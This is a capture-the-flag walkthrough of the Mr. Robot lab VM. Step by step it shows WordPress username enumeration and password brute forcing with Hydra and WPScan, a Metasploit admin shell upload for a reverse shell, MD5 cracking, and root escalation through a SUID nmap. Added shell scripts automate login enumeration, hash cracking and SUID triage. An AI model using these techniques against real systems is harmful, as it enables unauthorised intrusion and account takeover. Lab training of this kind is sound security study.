Mr. Robot CTF Walkthrough
netdiscover -i wlan0 – find the target's address on the local network
nmap -sV -O 192.168.1.108 – scan the target for open ports, service versions and an OS guess
Run web vulnerability scanners such as WPScan or Nikto to identify the CMS and any obvious weaknesses.
wpscan --url http://192.168.1.108
nikto -h 192.168.1.108
Capturing the first flag
Read http://192.168.1.108/robots.txt. It lists two files: fsocity.dic (a wordlist) and key-1-of-3.txt.
Fetch both with wget (or through Burp Suite) and open the first key.
wget http://<IP>/fsocity.dic
wget http://<IP>/key-1-of-3.txt
Optimizing the dictionary file
The dictionary file contains a large number of duplicate entries, so it should be deduplicated and sorted before use.
This pays off in the brute-force/dictionary attack later: every candidate is tried exactly once, in order, which cuts both the size of the wordlist and the cracking time.
sort -u fsocity.dic > Newfsocity.dic
(sort -u already removes duplicates, so piping the result through uniq afterwards does nothing.)
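As an added example (my own script, not part of the original walkthrough), here is the deduplication step wrapped so it reports how much smaller the wordlist became. The sample wordlist and the file names are constructed for the demonstration; point it at fsocity.dic to run it for real.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: deduplicate a wordlist
# and report the size before and after. The sample wordlist is constructed
# here so the script runs stand-alone.

# Write a small constructed wordlist, with duplicates, to the path in $1.
make_sample_wordlist() {
    printf '%s\n' elliot password elliot ER28 password Elliot elliot > "$1"
}

# Line count of a file, with the padding some wc builds add stripped.
count_lines() {
    wc -l < "$1" | tr -d ' '
}

# sort -u drops exact duplicates; a trailing "uniq" would have nothing left to do.
# LC_ALL=C makes the comparison byte-wise, so "Elliot" and "elliot" stay separate
# (WordPress usernames are case-insensitive, so add -f to fold them if wanted).
dedupe_wordlist() {
    src="$1"
    dst="$2"
    LC_ALL=C sort -u "$src" > "$dst"
    echo "$(count_lines "$src") -> $(count_lines "$dst") entries"
}

# Usage: sh dedupe.sh fsocity.dic Newfsocity.dic
if [ "$#" -eq 2 ]; then
    dedupe_wordlist "$1" "$2"
fi
```

The before/after count is worth printing every time: it tells you how many attempts the later Hydra and WPScan runs will actually make, and a suspiciously small number usually means the download was truncated.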
Use the WPScan output to confirm the login page (/wp-login.php). We need a username and a password; the dictionary we just downloaded gives us candidates for both.
To find the username we intercept the login request and watch how the form answers. Burp or ZAP will do; this walkthrough uses Burp.
With the browser proxied through Burp, turn intercept on, enter any credentials and hit Log In.
The intercepted POST request shows the form fields we need to brute force.
Now we need an online (network) brute-forcer; Hydra is a good choice.
The fields we care about are log (the username) and pwd (the password).
The plan is to find a valid username first and then brute force its password.
hydra -V -L Newfsocity.dic -p test 192.168.1.108 http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'
In the http-post-form module the F= string is the text that marks a failed attempt; this pattern works for most login forms.
WordPress gives the game away here: a non-existent user gets "Invalid username", while an existing user with a wrong password gets a different error, so any response that does not contain "Invalid username" points at a real account.
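To make the F= logic concrete, here is an added example (my own script, not from the original walkthrough) that classifies a wp-login.php response the same way Hydra's failure string does, and optionally probes a live target with curl. The response bodies are constructed from the error strings older WordPress versions return; newer releases word the unknown-user message differently ("Unknown username"), so always confirm the exact text in Burp before relying on it. The target URL and wordlist path are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: classify a wp-login.php
# response the way hydra's F= condition does. The sample bodies below are
# constructed from the login errors older WordPress versions return.

# Print one word describing what the login response body tells us:
#   nouser  - "Invalid username": the account does not exist
#   badpass - the username exists, the password was wrong
#   success - no login error in the page (a real login usually 302s to wp-admin)
classify_login_response() {
    body="$1"
    case "$body" in
        *"Invalid username"*) echo nouser ;;
        *"The password you entered for the username"*) echo badpass ;;
        *) echo success ;;
    esac
}

# Try one candidate username against a live target with a dummy password.
# Assumed target URL; only called when a target is given on the command line.
probe_username() {
    url="$1"
    user="$2"
    body=$(curl -s --data-urlencode "log=$user" --data-urlencode "pwd=test" \
                  --data-urlencode "wp-submit=Log In" "$url/wp-login.php")
    printf '%s %s\n' "$user" "$(classify_login_response "$body")"
}

# Constructed response bodies, cut down to the relevant login_error div.
NOUSER_BODY='<div id="login_error"><strong>ERROR</strong>: Invalid username. <a href="/wp-login.php?action=lostpassword">Lost your password?</a></div>'
BADPASS_BODY='<div id="login_error"><strong>ERROR</strong>: The password you entered for the username <strong>elliot</strong> is incorrect.</div>'

# Usage: sh enum.sh http://192.168.1.108 Newfsocity.dic
# Prints only the candidates that are not rejected as unknown users.
if [ "$#" -eq 2 ]; then
    while IFS= read -r candidate || [ -n "$candidate" ]; do
        result=$(probe_username "$1" "$candidate")
        case "$result" in
            *nouser) ;;
            *) echo "$result" ;;
        esac
    done < "$2"
fi
```

The point of the three-way split is that Hydra's F= check is only one bit of information; keeping "badpass" and "success" apart lets you spot a lucky hit on the dummy password as well as the username you were after.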
With the username (elliot) known, switch to WPScan for the password, since it is faster at WordPress cracking:
wpscan --url http://192.168.1.108 --wordlist /home/alexis/Desktop/Newfsocity.dic --username elliot
(Newer WPScan releases take -U elliot -P Newfsocity.dic instead of --username and --wordlist.)
We can now log in. Since elliot is an administrator we can install plugins such as a file manager. The next goal is to maintain access and escalate privileges. One option is Weevely for a backdoor and reverse shell; the easier route is Metasploit, whose WordPress admin shell upload module (exploit/unix/webapp/wp_admin_shell_upload) does the hard work and hands us a Meterpreter session for the reverse connection.
In msfconsole: use the module, set USERNAME, PASSWORD and RHOST (and TARGETURI if WordPress is not served from /), then exploit.
The result is a Meterpreter session whose shell has no tty (no proper terminal).
Upgrade it to a tty shell next.
People tend to over-complicate this step; the usual Python one-liner is all it takes:
python -c 'import pty; pty.spawn("/bin/sh")'
Check who we are logged in as with id.
In robot's home directory there are two files of interest: key-2-of-3.txt and password.raw-md5. We need robot's password before we can read the key.
password.raw-md5 holds an MD5 hash of robot's password. Crack it with hashcat (mode 0, raw MD5) or, the lazy way, paste it into crackstation.net.
With the cracked password, su to robot.
We can then read the second key.
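As an added example (my own script, not from the original walkthrough), this is what hashcat or crackstation do for a raw MD5 hash, reduced to md5sum and a wordlist loop, so you can see the check and run it offline when you have no cracker to hand. The "user:hash" layout, the sample hash (MD5 of the constructed word "password") and the tiny wordlist are all constructed for the demonstration and are not the contents of the VM's password.raw-md5.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: crack a raw MD5 hash
# against a wordlist the way hashcat -m 0 or crackstation would, using only
# md5sum. The hash, the wordlist and the password.raw-md5-style line are constructed.

# Hex MD5 of a string, without the trailing newline that echo would add
# (hashing "word\n" instead of "word" is the classic reason a crack "fails").
md5_hex() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# Pull the hash out of a "user:hash" line, the layout assumed for password.raw-md5,
# and normalise it to lower case so it compares equal to md5sum output.
hash_from_line() {
    printf '%s' "$1" | cut -d: -f2 | tr 'A-F' 'a-f'
}

# Print the first word in the wordlist whose MD5 matches the target; exit 1 if none.
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    wordlist="$2"
    while IFS= read -r word || [ -n "$word" ]; do
        if [ "$(md5_hex "$word")" = "$target" ]; then
            echo "$word"
            return 0
        fi
    done < "$wordlist"
    return 1
}

# Constructed inputs: a password.raw-md5-style line and a four-word wordlist.
SAMPLE_LINE='robot:5f4dcc3b5aa765d61d8327deb882cf99'
make_sample_wordlist() {
    printf '%s\n' elliot fsociety password mrrobot > "$1"
}

# Usage: sh crack.sh password.raw-md5 Newfsocity.dic
if [ "$#" -eq 2 ]; then
    crack_md5 "$(hash_from_line "$(head -n 1 "$1")")" "$2" || echo "not in wordlist"
fi
```

Running it against the full deduplicated fsocity.dic is slow because each word forks md5sum, which is exactly why hashcat exists; the logic, however, is the same.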
Now we need root access, i.e. privilege escalation.
One of the most common routes is a root-owned binary with the set-user-ID (SUID) bit, which runs with root's privileges no matter who launches it.
The find command lists them (2>/dev/null hides the permission-denied noise):
find / -perm -4000 -type f 2>/dev/null
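As an added example (my own script, not from the original walkthrough), here is the find command wrapped in a small triage filter that drops the SUID binaries every Linux box has (sudo, passwd, mount and friends) and keeps only the ones known to hand out a shell, nmap's interactive mode included. The list of escapable binaries is my own short selection, not an exhaustive one, and the sample find output is constructed.

```shell
#!/bin/sh
# Added example, not part of the original walkthrough: list SUID files and
# flag the ones that are known to give a shell when they run as root.
# The sample find output below is constructed.

# Binaries that hand out a shell when SUID root: older nmap via --interactive
# and "!sh", vi/vim via ":!sh", find via -exec, the interpreters via -c,
# less/more via "!sh". Debian ships vim as vim.basic, hence the vim.* pattern.
is_escapable() {
    case "$1" in
        nmap|vim|vim.*|vi|find|bash|sh|python|python[23]*|perl|awk|gawk|less|more) return 0 ;;
        *) return 1 ;;
    esac
}

# Read "find / -perm -4000 -type f" output on stdin and print only the paths
# whose basename is in the escapable list.
flag_suid() {
    while IFS= read -r path || [ -n "$path" ]; do
        name=${path##*/}
        if is_escapable "$name"; then
            echo "$path"
        fi
    done
}

# Live scan: -type f skips directories that merely carry the bit, and
# 2>/dev/null hides the unreadable-directory errors.
scan_suid() {
    find / -perm -4000 -type f 2>/dev/null | flag_suid
}

# Constructed find output for a stand-alone run.
SAMPLE_FIND='/usr/bin/sudo
/usr/bin/passwd
/usr/local/bin/nmap
/bin/mount
/usr/bin/vim.basic
/bin/ping'

# Usage: sh suid.sh            (filters the sample above)
#        sh suid.sh live       (runs the real find on this host)
if [ "$1" = live ]; then
    scan_suid
elif [ "$#" -eq 0 ]; then
    printf '%s\n' "$SAMPLE_FIND" | flag_suid
fi
```

On the target this prints /usr/local/bin/nmap among the results, which is the hint that sends us to nmap's interactive mode; anything else the filter prints is worth a look in GTFOBins before you commit to one route.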
Nmap is in the list, so it runs as root.
Older Nmap releases have an interactive mode (nmap --interactive) that accepts shell commands, which is all we need.
!sh – typed at the interactive prompt spawns a root shell
id – and we are root!
cd /root and read the last key.